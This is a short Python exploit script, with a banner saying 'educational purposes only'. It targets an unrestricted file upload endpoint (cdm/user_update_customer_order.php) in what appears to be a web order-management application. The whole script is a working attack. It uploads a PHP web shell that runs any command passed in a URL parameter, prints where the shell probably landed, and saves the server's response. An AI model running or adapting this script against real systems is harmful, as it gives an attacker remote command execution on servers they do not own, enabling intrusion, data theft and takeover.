#!/usr/bin/env python3

###########################################
# Exploit Writed By hax / haxerr9         #
#                                         #
#                                         #
#     EDUCATIONAL PURPOSES ONLY!          #
# Take responsibilities at your own risk. #
###########################################

import requests
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Target Host (Ex: http(s)://test.com/).")
parser.add_argument("-f", "--file", help="File Name To Upload The WebShell. (Default: shell.php)", default="shell.php")

args = parser.parse_args()

if args.host.endswith("/"):
    url = f"{args.host}cdm/user_update_customer_order.php"
    print("URL: " + url)
    pUpload = "cdm/files/"

else:
    url = f"{args.host}/cdm/user_update_customer_order.php"
    print("URL: " + url)
    pUpload = "/cdm/files/"


file = args.file
print("Shell Name: " + file + "\n")

print("[?] Uploading WebShell...")

data = {"order_id": "123"}
files = {"uploaded_file": (f"{file}", "<?php system($_GET['cmd']); ?>", "application/octet-stream")}

response = requests.post(url, data=data, files=files)

print(f"[?] Possible Upload Location: {url}{pUpload}{file}")

print("[?] Response Status Code: ", response.status_code)

with open("response.txt", "w") as res:
    res.write(response.text)

print("[+] Response Text Saved In 'response.txt'.")